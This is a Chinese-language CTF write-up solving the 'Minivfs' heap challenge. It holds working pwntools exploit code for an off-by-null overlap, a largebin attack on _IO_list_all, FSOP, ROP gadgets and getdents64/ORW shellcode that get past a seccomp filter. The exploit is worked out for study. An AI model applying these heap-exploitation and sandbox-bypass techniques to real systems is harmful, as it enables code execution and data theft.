2026-03-18

SUCTF2026 Minivfs

阻穷西征，岩何越焉？

题目分析

模拟了一套简单的虚拟文件系统 , 包含了几个常用接口

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v3; // eax
  char *v4; // rax
  int n5; // [rsp+Ch] [rbp-254h]
  char *v7; // [rsp+10h] [rbp-250h]
  char *s1; // [rsp+20h] [rbp-240h]
  __int64 v9; // [rsp+28h] [rbp-238h]
  __int64 v10; // [rsp+30h] [rbp-230h]
  __int64 v11; // [rsp+38h] [rbp-228h]
  __int64 v12; // [rsp+40h] [rbp-220h]
  __int64 v13; // [rsp+48h] [rbp-218h]
  _BYTE v14[520]; // [rsp+50h] [rbp-210h] BYREF
  unsigned __int64 v15; // [rsp+258h] [rbp-8h]

  v15 = __readfsqword(0x28u);
  init();
  puts("mini-vfs ready.");
  while ( 1 )
  {
    printf("vfs> ");
    if ( input(0LL, v14, 512LL) <= 0 )
      return 0LL;
    if ( v14[0] )
    {
      s1 = 0LL;
      v9 = 0LL;
      v10 = 0LL;
      v11 = 0LL;
      v12 = 0LL;
      v13 = 0LL;
      n5 = 0;
      v7 = v14;
      while ( *v7 && n5 <= 5 )
      {
        while ( *v7 && ((*__ctype_b_loc())[(unsigned __int8)*v7] & 0x2000) != 0 )
          ++v7;
        if ( !*v7 )
          break;
        v3 = n5++;
        (&s1)[v3] = v7;
        while ( *v7 && ((*__ctype_b_loc())[(unsigned __int8)*v7] & 0x2000) == 0 )
          ++v7;
        if ( *v7 )
        {
          v4 = v7++;
          *v4 = 0;
        }
      }
      if ( n5 )
      {
        if ( !strcmp(s1, "exit") || !strcmp(s1, "quit") )
        {
          puts("bye");
          return 0LL;
        }
        if ( !strcmp(s1, "ls") )
        {
          ls();                                 // only printf
        }
        else if ( !strcmp(s1, "stat") )
        {
          if ( n5 != 3 )
            goto LABEL_39;
          stat(v9, v10);
        }
        else if ( !strcmp(s1, "touch") )
        {
          if ( n5 != 4 )
            goto LABEL_39;
          touch(v9, v10, v11);
        }
        else if ( !strcmp(s1, "rm") )
        {
          if ( n5 != 3 )
            goto LABEL_39;
          rm(v9, v10);
        }
        else if ( !strcmp(s1, "cat") )
        {
          if ( n5 == 3 )
            cat(v9, v10);
          else
LABEL_39:
            puts("[err] incorrect command.");
        }
        else if ( !strcmp(s1, "write") )
        {
          if ( n5 != 4 )
            goto LABEL_39;
          write_0(v9, v10, v11);
        }
        else
        {
          puts("unknown command.");
        }
      }
    }
  }
}

其中touch对应add , rm对应delet , cat对应show , write对应edit

stat和ls则可以查看单个文件的情况和整体文件的列表

TOUCH

经过了一定程度的混淆, 使用的规则为

1	touch <filename> <size> <auth>

其中auth有一套简单的哈希计算逻辑

__int64 __fastcall sub_15F6(__int64 a1, int *a2)
{
  unsigned int v2; // eax
  unsigned int v4; // [rsp+1Ch] [rbp-4h]
  int v5; // [rsp+1Ch] [rbp-4h]

  v2 = sub_15AB(a1);
  v4 = 0x846CA68B * (((0x7FEB352D * (HIWORD(v2) ^ v2)) >> 15) ^ (0x7FEB352D * (HIWORD(v2) ^ v2)));
  v5 = HIWORD(v4) ^ v4;
  if ( a2 )
    *a2 = v5;
  return v5 & 0xF;
}

size的大小必须位于(0x417 , 0x500] , 也就是largebins的范围 ; 堆指针会被储存在全局变量中

我们可以用一个简单的脚本得出filename对应的hash

def calc_auth(path: str) -> int:
    v = 0x811C9DC5
    for ch in path.encode():
        v = ((ch ^ v) * 16777619) & 0xFFFFFFFF
    t = ((v >> 16) ^ v) & 0xFFFFFFFF
    t = (0x7FEB352D * t) & 0xFFFFFFFF
    t = ((t >> 15) ^ t) & 0xFFFFFFFF
    v4 = (0x846CA68B * t) & 0xFFFFFFFF
    h = ((v4 >> 16) ^ v4) & 0xFFFFFFFF
    return h ^ AUTH_XOR

rm

使用规则为

1	rm <filename> <auth>

可以看到不存在uaf

write

使用规则为

1 2	write <path> <nbytes> <auth> <body>

注意到, 这里memcpy后, 会把末尾+1的bytes进行置零操作

所以这里存在off-by-null操作

cat

使用规则为

1	cat <path> <auth>

比较常规没什么好说的

可以看到每种hash只有一个全局变量的槽位

也就是即使名字不同也可能存在哈希碰撞, 这一点要特别注意, 以免堆块申请失败

可以编写出如下的辅助函数

from __future__ import annotations
from typing import Optional, Union
from pwn import *
context.arch='amd64'
PROMPT = b"vfs> "
AUTH_XOR = 0xA5A5A5A5
def calc_auth(path: str) -> int:
    v = 0x811C9DC5
    for ch in path.encode():
        v = ((ch ^ v) * 16777619) & 0xFFFFFFFF
    t = ((v >> 16) ^ v) & 0xFFFFFFFF
    t = (0x7FEB352D * t) & 0xFFFFFFFF
    t = ((t >> 15) ^ t) & 0xFFFFFFFF
    v4 = (0x846CA68B * t) & 0xFFFFFFFF
    h = ((v4 >> 16) ^ v4) & 0xFFFFFFFF
    return h ^ AUTH_XOR

def _fmt_num(x: Union[int, str]) -> str:
    return x if isinstance(x, str) else hex(x)


def _send_cmd(cmd: str) -> bytes:
    io.sendline(cmd.encode())
    return io.recvuntil(PROMPT, drop=True)


def touch(path: str, size: Union[int, str]) -> bytes:
    auth = calc_auth(path)
    return _send_cmd(f"touch {path} {_fmt_num(size)} 0x{auth:08x}")

def write(path, data, nbytes=None):
    if isinstance(data, str):
        data = data.encode()
    if nbytes is None:
        nbytes = len(data)
    assert len(data) == nbytes

    io.sendline(f"write {path} {nbytes} 0x{calc_auth(path):08x}".encode())
    io.sendafter(f"body({nbytes} bytes) > ".encode(), data)
#    return io.recvuntil(b"vfs> ", drop=True)

def stat(path: str) -> bytes:
    auth = calc_auth(path)
    return _send_cmd(f"stat {path} 0x{auth:08x}")


def rm(path: str) -> bytes:
    auth = calc_auth(path)
    return _send_cmd(f"rm {path} 0x{auth:08x}")


def cat(path: str) -> bytes:
    auth = calc_auth(path)
    return _send_cmd(f"cat {path} 0x{auth:08x}")
def bug():
    gdb.attach(io)

攻击链分析

信息泄露

我们可以发现, 当被rm的file地址再次被touch , touch原语并没有清除原本地址内的指针数据

于是我们可以轻松地利用unsortedbins泄露出堆地址和libc地址

touch("1111",0x480)
touch("2222",0x480)
touch("3333",0x480)
touch("4444",0x480)
rm("1111")
touch("1111",0x480)
cat("1111")
base=u64(io.recv(8))-0x210b20
print(hex(base))
rm("1111")
rm("3333")
touch("1111",0x480)
write("1111",b'a'*8, 8)
cat("1111")
io.recvuntil(b"a"*8)
heap=u64(io.recv(8))-0xb00
print(hex(heap))
rm("1111")
rm("2222")
rm("4444")

此时将堆内存恢复到最初没有申请的状态

off-by-null

本次libc的版本为2.41, 属于标准的高版本

2.27以上的off-by-null有着特殊的手法

首先我们要准备ABC三个堆块和一个隔离堆块

其中B必须复用C的pre_size位 (sizeof(B)以8结尾)

第一步, 在A中伪造一个fake_chunk , 使得sizeof(fake_chunk)=sizeof(A+B)-0x10 (剔除chunk_head_A)

第二步, 编辑B, 在C的pre_size中填上sizeof(fake_chunk), 此时因为off-by-null导致C的pre_inuse位被置零

此时在ptmalloc2的视角中 :

C的前一个堆块的大小是fake_chunk , 且前一个堆块处于释放状态
fake_chunk的前一个堆块处于使用中状态不可合并, 且大小为fake_chunk, 与C的pre_size相符

此时释放C, ptmalloc2会判断前个堆块可合并, 且合并后被放入unsortedbins中

此时B虽然处于使用中, 但被送入了unsortedbins中

对应以下操作

touch("1111",0x440)
touch("2222",0x448)#overlap
touch("3333",0x4f0)
touch("4444",0x4f0)
touch("6666666",0x500)
touch("7777i7",0x500)
touch("888i:88888",0x430)
touch("858585858588",0x4f0)
payload=p64(0)+p64(0x891)+p64(heap+0x2a0)*2
write("1111",payload)
payload=b'a'*0x440+p64(0x890)
write("2222",payload)
rm("3333")

此时拥有了以下的效果

pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.

Allocated chunk | PREV_INUSE
Addr: 0x55555555c000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c290
Size: 0x450 (with flag bits: 0x451)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c6e0
Size: 0x450 (with flag bits: 0x451)

Allocated chunk
Addr: 0x55555555cb30
Size: 0x500 (with flag bits: 0x500)

Allocated chunk
Addr: 0x55555555d030
Size: 0x500 (with flag bits: 0x500)

Allocated chunk | PREV_INUSE
Addr: 0x55555555d530
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x55555555da40
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x55555555df50
Size: 0x440 (with flag bits: 0x441)

Allocated chunk | PREV_INUSE
Addr: 0x55555555e390
Size: 0x500 (with flag bits: 0x501)

Top chunk | PREV_INUSE
Addr: 0x55555555e890
Size: 0x1e770 (with flag bits: 0x1e771)

pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x55555555c2a0 —▸ 0x7ffff7e10b20 ◂— 0x55555555c2a0
smallbins
empty
largebins
empty

此时虽然形成了堆叠, 但手法仍未结束, 我们必须取出包裹中的B , 形成双指针指向B才能真正利用

1
2
3

touch("3333",0x438)
touch("2222222222222",0x448)#overlap with 2222
touch("3333333iiii3",0x4f0)

此时我们获得了完全重叠的2222和2222222222222

largebins-attack

因为elf要求我们申请的大小必须在unsorted-bins中

所以只能使用largebins-attack , 我们可以将堆地址写入_IO_list_all进行FSOP

下面给出how2pwn仓库中largebins-attack的最小poc

int main(){
  setvbuf(stdin,NULL,_IONBF,0);
  setvbuf(stdout,NULL,_IONBF,0);
  setvbuf(stderr,NULL,_IONBF,0);
  size_t target = 0;
  size_t *p1 = malloc(0x428);
  size_t *g1 = malloc(0x18);
  size_t *p2 = malloc(0x418);
  size_t *g2 = malloc(0x18);
  free(p1);
  size_t *g3 = malloc(0x438);
  free(p2);
  p1[3] = (size_t)((&target)-4);	// 修改bk_nextsize
  size_t *g4 = malloc(0x438);
  return 0;
}

我们需要先形成一个chunk位于unsortedbins, 一个chunk位于largebins中的状态

这个很容易实现, 只要unsortedbins中的chunk不符合申请大小便可以从unsortedbins转移到largebins中

rm("2222")
rm("7777i7")
touch("7777i7",0x500)
rm("888i:88888")

因为unsortedbins是尾插, 当申请0x510堆块时会从2222开始扫, 导致2222被放入了largebins中, 最后将7777i7申请

最后再释放888i:88888就形成了预期结构

tcachebins
empty
fastbins
empty
unsortedbin
all: 0x55555555df50 —▸ 0x7ffff7e10b20 ◂— 0x55555555df50
smallbins
empty
largebins
0x440-0x470: 0x55555555c6e0 —▸ 0x7ffff7e10f20 ◂— 0x55555555c6e0

下一步就该 : 将largebins堆块的bk_nextsize指针修改为<target>-0x20

可以通过2222222222222办到这一点, 最后再申请一个同时超过bins中两个堆块大小的堆块

_IO_list_all=base+libc.sym._IO_list_all
payload=b'a'*0x18+p64(_IO_list_all-0x20)
write("2222222222222",payload)
touch("888i:88888",0x500)

以下为部分gdb信息

pwndbg> telescope 0x7ffff7e114c0
00:0000│     0x7ffff7e114c0 (_IO_list_all) —▸ 0x55555555df50 ◂— 0x510
01:0008│     0x7ffff7e114c8 ◂— 0
... ↓     2 skipped
04:0020│     0x7ffff7e114e0 (_IO_2_1_stderr_) ◂— 0xfbad2087
05:0028│     0x7ffff7e114e8 (_IO_2_1_stderr_+8) —▸ 0x7ffff7e11563 (_IO_2_1_stderr_+131) ◂— 0xe127a00000000000
... ↓     2 skipped
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x55555555c000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c290
Size: 0x450 (with flag bits: 0x451)

Free chunk (largebins) | PREV_INUSE
Addr: 0x55555555c6e0
Size: 0x450 (with flag bits: 0x451)
fd: 0x55555555df50
bk: 0x6161616161616161
fd_nextsize: 0x6161616161616161
bk_nextsize: 0x55555555df50

Allocated chunk
Addr: 0x55555555cb30
Size: 0x500 (with flag bits: 0x500)

Allocated chunk | PREV_INUSE
Addr: 0x55555555d030
Size: 0x500 (with flag bits: 0x501)

Allocated chunk | PREV_INUSE
Addr: 0x55555555d530
Size: 0x510 (with flag bits: 0x511)

Allocated chunk | PREV_INUSE
Addr: 0x55555555da40
Size: 0x510 (with flag bits: 0x511)

Free chunk (largebins) | PREV_INUSE
Addr: 0x55555555df50
Size: 0x440 (with flag bits: 0x441)
fd: 0x7ffff7e10f20
bk: 0x55555555c6e0
fd_nextsize: 0x55555555c6e0
bk_nextsize: 0x7ffff7e114a0

可以看到0x55555555df50(888i:88888)被写入了目标

但是我们没有操作这个堆块的指针, 只需要最后一步, 将这个堆块申请出来, 就可以将2222222222的地址写入_IO_list_all中

1	touch("2222",0x430)

可以看到

pwndbg> telescope 0x7ffff7e114c0
00:0000│     0x7ffff7e114c0 (_IO_list_all) —▸ 0x55555555c6e0 ◂— 0
01:0008│     0x7ffff7e114c8 ◂— 0
... ↓     2 skipped
04:0020│     0x7ffff7e114e0 (_IO_2_1_stderr_) ◂— 0xfbad2087
05:0028│     0x7ffff7e114e8 (_IO_2_1_stderr_+8) —▸ 0x7ffff7e11563 (_IO_2_1_stderr_+131) ◂— 0xe127a00000000000
... ↓     2 skipped
pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.

Allocated chunk | PREV_INUSE
Addr: 0x55555555c000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x55555555c290
Size: 0x450 (with flag bits: 0x451)

Free chunk (largebins) | PREV_INUSE
Addr: 0x55555555c6e0
Size: 0x450 (with flag bits: 0x451)
fd: 0x7ffff7e10f20
bk: 0x6161616161616161
fd_nextsize: 0x6161616161616161
bk_nextsize: 0x7ffff7e114a0

现在我们可以通过3333复用2222222222的pre_size位写入魔术头, 然后伪造其他字段形成完整的结构体

House of some

zer00ne@zer00ne-VMware-Virtual-Platform:~/desktop/SUCTF/work$ seccomp-tools dump ./pwn
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x07 0x00 0x0000003b  if (A == execve) goto 0013
 0006: 0x15 0x06 0x00 0x00000142  if (A == execveat) goto 0013
 0007: 0x15 0x05 0x00 0x00000039  if (A == fork) goto 0013
 0008: 0x15 0x04 0x00 0x0000003a  if (A == vfork) goto 0013
 0009: 0x15 0x03 0x00 0x00000038  if (A == clone) goto 0013
 0010: 0x15 0x02 0x00 0x000001b3  if (A == 0x1b3) goto 0013
 0011: 0x15 0x01 0x00 0x00000065  if (A == ptrace) goto 0013
 0012: 0x15 0x00 0x01 0x000000f6  if (A != kexec_load) goto 0014
 0013: 0x06 0x00 0x00 0x00000000  return KILL
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW

这道题开启了沙箱 , 也就是说必须使用orw

这就涉及到了ROP

刚刚好house of some就可以完美解决这个问题 , 详细内容可以看我的另一篇文章 : house of some

这里就是公式地写出

读IO_FILE(读栈地址) ->写IO_FILE(写入下一个写IO_FILE)->写IO_FILE劫持read函数的返回地址进行稳定的ROP

write("3333",b'a'*0x430+p64(0x800 | 0x1000)[:-1])

fake1=flat({
    0x00:p64(0x800 | 0x1000),
    0x20:p64(environ),
    0x28:p64(environ+8),
    0x68:p64(wide),
    0x70:p64(1), 
    0x88:p64(heap+0x1000),
    0xd8:p64(_IO_file_jumps)
    },filler=b'\x00')
fake1=fake1[0x10:]
write("2222222222222",fake1)

fake2=flat({
    0x38: p64(new),#start
    0x40: p64(new+0x300),#end
    0x68: p64(new),#chain
    0x88: p64(heap+0x1000),
    0xa0: p64(wide+0xd8+8),#wide
    0xc0: p64(2), 
    0xd8: p64(_IO_wfile_jumps), 
}, filler=b"\x00")
fake3= flat({
    0xe0: p64(_IO_file_jumps - 0x48),
    0x20: p64(1)
}, filler=b"\x00")
write("2222",fake2+fake3)
#bug()
io.sendline(b"quit")
io.recvuntil(b"bye\n")
stack=u64(io.recv(8))
print(hex(stack))
fake4= fake2=flat({
    0x38: p64(stack-0x330),#start
    0x40: p64(stack+0x500),#end
    0x88: p64(heap+0x1000),
    0xa0: p64(new+0xd8+8),#wide
    0xc0: p64(2),
    0xd8: p64(_IO_wfile_jumps),
}, filler=b"\x00")
fake5= flat({
    0xe0: p64(_IO_file_jumps - 0x48),
    0x20: p64(1)
}, filler=b"\x00")
pause()
io.send(fake4+fake5)
pause()

getdents64

这道题的远程环境有一个小trick

真flag被重命名为了flag_<hash>

我们没法直接读flag文件, 这就涉及到了一个系统调用getdents64 :

getdents64 是 Linux 内核提供的一个底层系统调用，用于读取目录项（directory entries），也就是列出目录中的文件和子目录。它是 readdir() , system("ls")等高级接口在底层的实现基础之一。

也就是说我们可以先打印文件名再进行读文件

我选择ROP转shellcode, 这样可以精密地操作执行流

ret=base+0x0000000000028882
rdi=base+0x0000000000119e9c
rsi=base+0x000000000011b07d
rdx=base+0x000000000009e68d # pop rdx ; leave ; ret
rbp=base+0x0000000000028a20
rax=base+0x00000000000e4e97
syscall=base+0x000000000009f4a6
payload =p64(ret)*2
payload+=p64(rdi)+p64(stack&~0xfff)+p64(rsi)+p64(0x20000)+p64(rbp)+p64(stack-0x330+0x60)+p64(rdx)+p64(7)
payload+=p64(ret)*0x20
payload+=p64(rax)+p64(10)+p64(syscall)+p64(rdi)+p64(stack-0x330+0x188+0x20)+p64(base+0x000000000006b92e)
payload+=asm("nop;"*0x200)

关于getdents64直接给出AI生成的板子

shellcode= f"""
    /* 第一步：open(".", O_RDONLY | O_DIRECTORY) */
    push 0x2e          /* "." 的 ASCII */
    mov rdi, rsp       /* 路径名指向栈上的 "." */
    xor rsi, rsi       /* flags = O_RDONLY (0) */
    mov rax, 2         /* SYS_open */
    syscall
    
    /* 保存文件描述符 fd 到 r15 */
    mov r15, rax       
    
    /* 在栈上开辟一个缓冲区用于存储 getdents 的结果 */
    sub rsp, 0x1000    /* 4096 字节缓冲区 */
    mov r14, rsp       /* r14 指向缓冲区起始地址 */

getdents_loop:
    /* 第二步：getdents64(fd, buf, count) */
    mov rdi, r15       /* fd */
    mov rsi, r14       /* buf */
    mov rdx, 0x1000    /* count = 4096 */
    mov rax, 217       /* SYS_getdents64 */
    syscall

    /* 检查返回值，如果 <= 0 则退出 */
    test rax, rax
    jle exit
    
    /* rax 是读取的总字节数，保存到 r13 作为遍历终点 */
    mov r13, rax
    xor r12, r12       /* r12 是当前缓冲区内的偏移量 */

parse_dirent:
    /* 
       linux_dirent64 结构体:
       - d_ino:    8 bytes
       - d_off:    8 bytes
       - d_reclen: 2 bytes (当前项的总长度)
       - d_type:   1 byte
       - d_name:   char[] (文件名起始位置，偏移 19 字节)
    */

    /* 第三步：write(1, d_name, len) */
    /* 计算文件名地址: buf + offset + 19 */
    lea rsi, [r14 + r12 + 19] 
    
    /* 寻找文件名长度 (直到碰到 null 终止符) */
    mov rdi, rsi
    xor rdx, rdx
find_len:
    cmp byte ptr [rdi + rdx], 0
    je print_name
    inc rdx
    jmp find_len

print_name:
    mov rdi, 1         /* stdout */
    mov rax, 1         /* SYS_write */
    syscall

    /* 打印一个换行符以便阅读 */
    push 0x0a
    mov rsi, rsp
    mov rdx, 1
    mov rdi, 1
    mov rax, 1
    syscall
    pop rcx

    /* 移动偏移量 r12 += d_reclen */
    movzx rcx, word ptr [r14 + r12 + 16] /* d_reclen 在偏移 16 处 */
    add r12, rcx
    
    /* 检查是否处理完缓冲区中所有项 */
    cmp r12, r13
    jl parse_dirent
    
    /* 继续调用 getdents 读取剩余项 */
    jmp getdents_loop

exit:
    mov rax, 60        /* SYS_exit */
    xor rdi, rdi
    syscall
    """

最后将ROP_shellcode发送

1 2	payload+=shellcode io.send(payload)

此时可以获得当前目录文件名 (远程环境关了, 我就本地演示了)

zer00ne@zer00ne-VMware-Virtual-Platform:~/desktop/SUCTF/work$ python3 exp.py 
[+] Starting local process './pwn': pid 48032
[*] '/home/zer00ne/desktop/SUCTF/work/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
0x7ffff7c00000
0x55555555c000
0x7ffff7e114c0
0x7fffffffdce8
[*] Paused (press any to continue)
[*] Paused (press any to continue)
[*] Switching to interactive mode
[*] Process './pwn' stopped with exit code 0 (pid 48032)
.
..
exp.py.back
pwn
.gdb_history
exp.py
gadget.txt
ld-linux-x86-64.so.2
rdx.txt
libc.so.6
[*] Got EOF while reading in interactive
$ 
[*] Interrupted

此时获得了文件名后就可以将shellcode修改为

1	shellcode=asm(shellcraft.cat("flag_<hash>"))